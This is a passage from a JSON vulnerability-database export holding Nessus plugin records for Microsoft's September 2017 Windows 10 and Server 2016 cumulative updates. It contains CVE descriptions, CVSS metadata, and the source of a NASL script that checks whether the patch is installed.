memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the user's\n system. 
(CVE-2017-8678, CVE-2017-8679, CVE-2017-8709,\n CVE-2017-8719)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights.(CVE-2017-8720)\n\n - A spoofing vulnerability exists when Internet Explorer\n improperly handles specific HTML content. An attacker\n who successfully exploited this vulnerability could\n trick a user into believing that the user was visiting a\n legitimate website.\n (CVE-2017-8733)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user.\n (CVE-2017-8731, CVE-2017-8734)\n\n - A spoofing vulnerability exists when Microsoft Edge does\n not properly parse HTTP content. An attacker who\n successfully exploited this vulnerability could trick a\n user by redirecting the user to a specially crafted\n website. The specially crafted website could either\n spoof content or serve as a pivot to chain an attack\n with other vulnerabilities in web services.\n (CVE-2017-8735)\n\n - An information disclosure vulnerability exists in\n Microsoft browsers due to improper parent domain\n verification in certain functionality. An attacker who\n successfully exploited the vulnerability could obtain\n specific information that is used in the parent domain.\n (CVE-2017-8736)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows PDF Library improperly handles objects\n in memory. 
The vulnerability could corrupt memory in a\n way that enables an attacker to execute arbitrary code\n in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user.\n (CVE-2017-8728, CVE-2017-8737)\n\n - A security feature bypass vulnerability exists in Device\n Guard that could allow an attacker to inject malicious\n code into a Windows PowerShell session.(CVE-2017-8746)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browser JavaScript engines render content\n when handling objects in memory. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. (CVE-2017-8649, CVE-2017-8660, CVE-2017-8741,\n CVE-2017-8748)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. (CVE-2017-8747,\n CVE-2017-8749)\n\n - A remote code execution vulnerability exists when\n Microsoft browsers improperly access objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user.(CVE-2017-8750)\n\n - A security feature bypass exists in Microsoft Edge when\n the Edge Content Security Policy (CSP) fails to properly\n validate certain specially crafted documents. An\n attacker who exploited the bypass could trick a user\n into loading a page containing malicious content.\n (CVE-2017-8723, CVE-2017-8754)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Microsoft Edge. The vulnerability could corrupt memory\n in such a way that an attacker could execute arbitrary\n code in the context of the current user. 
An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user.\n (CVE-2017-11764, CVE-2017-8738, CVE-2017-8752,\n CVE-2017-8753, CVE-2017-8755, CVE-2017-8756)\n\n - A remote code execution vulnerability exists in the way\n Microsoft Edge handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2017-8757)\n\n - A remote code execution vulnerability exists when\n Microsoft .NET Framework processes untrusted input. An\n attacker who successfully exploited this vulnerability\n in software using the .NET framework could take control\n of an affected system.\n (CVE-2017-8759)\n \n - An information disclosure vulnerability exists in\n Microsoft browsers in the scripting engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to disclose files on a user's computer. 
(CVE-2017-8529)", "edition": 25, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-09-12T00:00:00", "title": "KB4038782: Windows 10 Version 1607 and Windows Server 2016 September 2017 Cumulative Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8704", "CVE-2017-8746", "CVE-2017-8681", "CVE-2017-8643", "CVE-2017-8713", "CVE-2017-8741", "CVE-2017-8757", "CVE-2017-8707", "CVE-2017-8695", "CVE-2017-8756", "CVE-2017-8731", "CVE-2017-8682", "CVE-2017-11764", "CVE-2017-0161", "CVE-2017-8719", "CVE-2017-8737", "CVE-2017-8699", "CVE-2017-8753", "CVE-2017-8749", "CVE-2017-8750", "CVE-2017-8709", "CVE-2017-8683", "CVE-2017-8752", "CVE-2017-8678", "CVE-2017-8628", "CVE-2017-8754", "CVE-2017-8735", "CVE-2017-8738", "CVE-2017-8714", "CVE-2017-8728", "CVE-2017-8686", "CVE-2017-8677", "CVE-2017-11766", "CVE-2017-8649", "CVE-2017-8747", "CVE-2017-8748", "CVE-2017-8679", "CVE-2017-8660", "CVE-2017-8687", "CVE-2017-8734", "CVE-2017-8711", "CVE-2017-8759", "CVE-2017-8676", "CVE-2017-8708", "CVE-2017-8688", "CVE-2017-8720", "CVE-2017-8692", "CVE-2017-8706", "CVE-2017-8702", "CVE-2017-8712", "CVE-2017-8736", "CVE-2017-8529", "CVE-2017-8733", "CVE-2017-8755", "CVE-2017-8675", "CVE-2017-8723"], "modified": "2017-09-12T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_SEP_4038782.NASL", "href": "https://www.tenable.com/plugins/nessus/103128", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103128);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/28\");\n\n script_cve_id(\n \"CVE-2017-0161\",\n \"CVE-2017-8529\",\n \"CVE-2017-8628\",\n \"CVE-2017-8643\",\n \"CVE-2017-8649\",\n \"CVE-2017-8660\",\n \"CVE-2017-8675\",\n \"CVE-2017-8676\",\n \"CVE-2017-8677\",\n \"CVE-2017-8678\",\n \"CVE-2017-8679\",\n \"CVE-2017-8681\",\n \"CVE-2017-8682\",\n \"CVE-2017-8683\",\n \"CVE-2017-8686\",\n \"CVE-2017-8687\",\n \"CVE-2017-8688\",\n \"CVE-2017-8692\",\n \"CVE-2017-8695\",\n \"CVE-2017-8699\",\n \"CVE-2017-8702\",\n \"CVE-2017-8704\",\n \"CVE-2017-8706\",\n \"CVE-2017-8707\",\n \"CVE-2017-8708\",\n \"CVE-2017-8709\",\n \"CVE-2017-8711\",\n \"CVE-2017-8712\",\n \"CVE-2017-8713\",\n \"CVE-2017-8714\",\n \"CVE-2017-8719\",\n \"CVE-2017-8720\",\n \"CVE-2017-8723\",\n \"CVE-2017-8728\",\n \"CVE-2017-8731\",\n \"CVE-2017-8733\",\n \"CVE-2017-8734\",\n \"CVE-2017-8735\",\n \"CVE-2017-8736\",\n \"CVE-2017-8737\",\n \"CVE-2017-8738\",\n \"CVE-2017-8741\",\n \"CVE-2017-8746\",\n \"CVE-2017-8747\",\n \"CVE-2017-8748\",\n \"CVE-2017-8749\",\n \"CVE-2017-8750\",\n \"CVE-2017-8752\",\n \"CVE-2017-8753\",\n \"CVE-2017-8754\",\n \"CVE-2017-8755\",\n \"CVE-2017-8756\",\n \"CVE-2017-8757\",\n \"CVE-2017-8759\",\n \"CVE-2017-11764\",\n \"CVE-2017-11766\"\n );\n script_xref(name:\"MSKB\", value:\"4038782\");\n script_xref(name:\"MSFT\", value:\"MS17-4038782\");\n\n script_name(english:\"KB4038782: Windows 10 Version 1607 and Windows Server 2016 September 2017 Cumulative Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4038782.\nIt is, therefore, affected 
by multiple vulnerabilities :\n\n - A race condition that could lead to a remote code\n execution vulnerability exists in NetBT Session Services\n when NetBT fails to maintain certain sequencing\n requirements. (CVE-2017-0161)\n\n - A vulnerability exists when Microsoft Edge improperly\n accesses objects in memory. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. (CVE-2017-11766)\n\n - A spoofing vulnerability exists in Microsoft's\n implementation of the Bluetooth stack. An attacker who\n successfully exploited this vulnerability could perform\n a man-in-the-middle attack and force a user's computer\n to unknowingly route traffic through the attacker's\n computer. The attacker can then monitor and read the\n traffic before sending it on to the intended recipient.\n (CVE-2017-8628)\n\n - An information disclosure vulnerability exists when\n Microsoft Edge improperly handles clipboard events. For\n an attack to be successful, an attacker must persuade a\n user to visit a malicious website and leave it open\n during clipboard activities. The update addresses the\n vulnerability by changing how Microsoft Edge handles\n clipboard events in the browser. (CVE-2017-8643)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. To exploit\n this vulnerability, an attacker would first have to log\n on to the system. An attacker could then run a specially\n crafted application that could exploit the vulnerability\n and take control of an affected system. 
The update\n addresses this vulnerability by correcting how the\n Windows kernel-mode driver handles objects in memory.\n (CVE-2017-8675)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2017-8676)\n\n - A information disclosure vulnerability exists when the\n Windows GDI+ component improperly discloses kernel\n memory addresses. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system.\n (CVE-2017-8677, CVE-2017-8681)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights.(CVE-2017-8682)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system.(CVE-2017-8683)\n\n - A memory corruption vulnerability exists in the Windows\n Server DHCP service when an attacker sends specially\n crafted packets to a DHCP failover server. 
An attacker\n who successfully exploited the vulnerability could\n either run arbitrary code on the DHCP failover server or\n cause the DHCP service to become nonresponsive.\n (CVE-2017-8686)\n\n - An Information disclosure vulnerability exists in\n Windows kernel that could allow an attacker to retrieve\n information that could lead to a Kernel Address Space\n Layout Randomization (KASLR) bypass. An attacker who\n successfully exploited this vulnerability could retrieve\n the memory address of a kernel object.(CVE-2017-8687)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface+ (GDI+)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability.(CVE-2017-8688)\n\n - A remote code execution vulnerability exists due to the\n way Windows Uniscribe handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2017-8692)\n\n - An information disclosure vulnerability exists when\n Windows Uniscribe improperly discloses the contents of\n its memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system.\n (CVE-2017-8695)\n\n - A remote code execution vulnerability exists when\n Windows Shell does not properly validate file copy\n destinations. An attacker who successfully exploited the\n vulnerability could run arbitrary code in the context of\n the current user. 
If the current user is logged on with\n administrative user rights, an attacker could take\n control of the affected system.\n (CVE-2017-8699)\n\n - An elevation of privilege vulnerability exists in\n Windows Error Reporting (WER) when WER handles and\n executes files. The vulnerability could allow elevation\n of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability\n could gain greater access to sensitive information and\n system functionality.\n (CVE-2017-8702)\n\n - A denial of service vulnerability exists when Microsoft\n Hyper-V Virtual PCI on a host server fails to properly\n validate input from a privileged user on a guest\n operating system.\n input. (CVE-2017-8704)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address, allowing an attacker to retrieve information\n that could lead to a Kernel Address Space Layout\n Randomization (KASLR) bypass. An attacker who\n successfully exploited this vulnerability could retrieve\n the base address of the kernel driver from a compromised\n process. (CVE-2017-8708)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system.\n (CVE-2017-8706, CVE-2017-8707, CVE-2017-8711,\n CVE-2017-8712, CVE-2017-8713)\n\n - A remote code execution vulnerability exists in the VM\n Host Agent Service of Remote Desktop Virtual Host role\n when it fails to properly validate input from an\n authenticated user on a guest operating system.\n (CVE-2017-8714)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. 
(CVE-2017-8678, CVE-2017-8679, CVE-2017-8709,\n CVE-2017-8719)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights.(CVE-2017-8720)\n\n - A spoofing vulnerability exists when Internet Explorer\n improperly handles specific HTML content. An attacker\n who successfully exploited this vulnerability could\n trick a user into believing that the user was visiting a\n legitimate website.\n (CVE-2017-8733)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user.\n (CVE-2017-8731, CVE-2017-8734)\n\n - A spoofing vulnerability exists when Microsoft Edge does\n not properly parse HTTP content. An attacker who\n successfully exploited this vulnerability could trick a\n user by redirecting the user to a specially crafted\n website. The specially crafted website could either\n spoof content or serve as a pivot to chain an attack\n with other vulnerabilities in web services.\n (CVE-2017-8735)\n\n - An information disclosure vulnerability exists in\n Microsoft browsers due to improper parent domain\n verification in certain functionality. An attacker who\n successfully exploited the vulnerability could obtain\n specific information that is used in the parent domain.\n (CVE-2017-8736)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows PDF Library improperly handles objects\n in memory. 
The vulnerability could corrupt memory in a\n way that enables an attacker to execute arbitrary code\n in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user.\n (CVE-2017-8728, CVE-2017-8737)\n\n - A security feature bypass vulnerability exists in Device\n Guard that could allow an attacker to inject malicious\n code into a Windows PowerShell session.(CVE-2017-8746)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browser JavaScript engines render content\n when handling objects in memory. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. (CVE-2017-8649, CVE-2017-8660, CVE-2017-8741,\n CVE-2017-8748)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. (CVE-2017-8747,\n CVE-2017-8749)\n\n - A remote code execution vulnerability exists when\n Microsoft browsers improperly access objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user.(CVE-2017-8750)\n\n - A security feature bypass exists in Microsoft Edge when\n the Edge Content Security Policy (CSP) fails to properly\n validate certain specially crafted documents. An\n attacker who exploited the bypass could trick a user\n into loading a page containing malicious content.\n (CVE-2017-8723, CVE-2017-8754)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Microsoft Edge. The vulnerability could corrupt memory\n in such a way that an attacker could execute arbitrary\n code in the context of the current user. 
An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user.\n (CVE-2017-11764, CVE-2017-8738, CVE-2017-8752,\n CVE-2017-8753, CVE-2017-8755, CVE-2017-8756)\n\n - A remote code execution vulnerability exists in the way\n Microsoft Edge handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2017-8757)\n\n - A remote code execution vulnerability exists when\n Microsoft .NET Framework processes untrusted input. An\n attacker who successfully exploited this vulnerability\n in software using the .NET framework could take control\n of an affected system.\n (CVE-2017-8759)\n \n - An information disclosure vulnerability exists in\n Microsoft browsers in the scripting engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to disclose files on a user's computer. 
(CVE-2017-8529)\");\n # https://support.microsoft.com/en-us/help/4038782/windows-10-update-kb4038782\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?62a3aab5\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4038782.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-8759\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS17-09\";\nkbs = make_list('4038782');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_nano() == 1) audit(AUDIT_OS_NOT, \"a currently supported OS (Windows Nano Server)\");\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"14393\",\n rollup_date:\"09_2017\",\n bulletin:bulletin,\n rollup_kb_list:[4038782])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-14T18:30:59", "description": "The remote Windows host is missing security update 4038788.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A race condition that could lead to a remote code\n execution vulnerability exists in NetBT Session Services\n when NetBT fails to maintain certain sequencing\n requirements. 
(CVE-2017-0161)\n\n - A vulnerability exists when Microsoft Edge improperly\n accesses objects in memory. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. (CVE-2017-11766)\n\n - An information disclosure vulnerability exists when\n Microsoft Edge does not properly handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the user's system.\n (CVE-2017-8597)\n\n - A spoofing vulnerability exists in Microsoft's\n implementation of the Bluetooth stack. An attacker who\n successfully exploited this vulnerability could perform\n a man-in-the-middle attack and force a user's computer\n to unknowingly route traffic through the attacker's\n computer. (CVE-2017-8628)\n\n - An information disclosure vulnerability exists when\n Microsoft Edge improperly handles clipboard events. For\n an attack to be successful, an attacker must persuade a\n user to visit a malicious website and leave it open\n during clipboard activities. The update addresses the\n vulnerability by changing how Microsoft Edge handles\n clipboard events in the browser. (CVE-2017-8643)\n\n - An information disclosure vulnerability exists when\n Microsoft Edge improperly handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-8648)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browser JavaScript engines render content\n when handling objects in memory. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. (CVE-2017-8649)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browser JavaScript engines render content\n when handling objects in memory. 
The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. (CVE-2017-8649, CVE-2017-8660)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode.\n (CVE-2017-8675)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2017-8676)\n\n - A information disclosure vulnerability exists when the\n Windows GDI+ component improperly discloses kernel\n memory addresses. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system.(CVE-2017-8677)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-8678)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-8678, CVE-2017-8679)\n\n - A information disclosure vulnerability exists when the\n Windows GDI+ component improperly discloses kernel\n memory addresses. 
An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system.\n (CVE-2017-8677, CVE-2017-8681)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2017-8682)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2017-8683)\n\n - An Information disclosure vulnerability exists in\n Windows kernel that could allow an attacker to retrieve\n information that could lead to a Kernel Address Space\n Layout Randomization (KASLR) bypass. An attacker who\n successfully exploited this vulnerability could retrieve\n the memory address of a kernel object.(CVE-2017-8687)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface+ (GDI+)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability.(CVE-2017-8688)\n\n - A remote code execution vulnerability exists due to the\n way Windows Uniscribe handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could take control of the affected system. 
An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2017-8692)\n\n - An information disclosure vulnerability exists when\n Windows Uniscribe improperly discloses the contents of\n its memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. (CVE-2017-8695)\n\n - A remote code execution vulnerability exists when\n Windows Shell does not properly validate file copy\n destinations. An attacker who successfully exploited the\n vulnerability could run arbitrary code in the context of\n the current user.\n (CVE-2017-8699)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system.\n (CVE-2017-8706)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system.\n (CVE-2017-8706, CVE-2017-8707)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address, allowing an attacker to retrieve information\n that could lead to a Kernel Address Space Layout\n Randomization (KASLR) bypass. (CVE-2017-8708)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. 
(CVE-2017-8678, CVE-2017-8679, CVE-2017-8709)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system.\n (CVE-2017-8706, CVE-2017-8707, CVE-2017-8712)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system. (CVE-2017-8706, CVE-2017-8707, \n CVE-2017-8712,CVE-2017-8713)\n\n - A security feature bypass vulnerability exists when\n Windows Control Flow Guard mishandles objects in memory.\n (CVE-2017-8716)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-8678, CVE-2017-8679, CVE-2017-8709,\n CVE-2017-8719)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. (CVE-2017-8720)\n\n - A security feature bypass exists in Microsoft Edge when\n the Edge Content Security Policy (CSP) fails to properly\n validate certain specially crafted documents. An\n attacker who exploited the bypass could trick a user\n into loading a page containing malicious content.\n (CVE-2017-8723)\n\n - A spoofing vulnerability exists when Microsoft Edge does\n not properly parse HTTP content. (CVE-2017-8724)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows PDF Library improperly handles objects\n in memory. The vulnerability could corrupt memory in a\n way that enables an attacker to execute arbitrary code\n in the context of the current user. 
An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user.\n (CVE-2017-8728)\n\n - A spoofing vulnerability exists when Internet Explorer\n improperly handles specific HTML content. An attacker\n who successfully exploited this vulnerability could\n trick a user into believing that the user was visiting a\n legitimate website. The specially crafted website could\n either spoof content or serve as a pivot to chain an\n attack with other vulnerabilities in web services. To\n exploit the vulnerability, the user must either browse\n to a malicious website or be redirected to it.\n (CVE-2017-8733)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-8734)\n\n - A spoofing vulnerability exists when Microsoft Edge does\n not properly parse HTTP content. An attacker who\n successfully exploited this vulnerability could trick a\n user by redirecting the user to a specially crafted\n website. The specially crafted website could either\n spoof content or serve as a pivot to chain an attack\n with other vulnerabilities in web services.\n (CVE-2017-8724, CVE-2017-8735)\n\n - An information disclosure vulnerability exists in\n Microsoft browsers due to improper parent domain\n verification in certain functionality. An attacker who\n successfully exploited the vulnerability could obtain\n specific information that is used in the parent domain.\n (CVE-2017-8736)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows PDF Library improperly handles objects\n in memory. 
The vulnerability could corrupt memory in a\n way that enables an attacker to execute arbitrary code\n in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user.\n (CVE-2017-8728, CVE-2017-8737)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Microsoft Edge. (CVE-2017-8739)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browser JavaScript engines render content\n when handling objects in memory. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user.(CVE-2017-8649, CVE-2017-8660, CVE-2017-8741)\n\n - A security feature bypass vulnerability exists in Device\n Guard that could allow an attacker to inject malicious\n code into a Windows PowerShell session. An attacker who\n successfully exploited this vulnerability could inject\n code into a trusted PowerShell process to bypass the\n Device Guard Code Integrity policy on the local machine.\n (CVE-2017-8746)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user.(CVE-2017-8747)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browser JavaScript engines render content\n when handling objects in memory. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. 
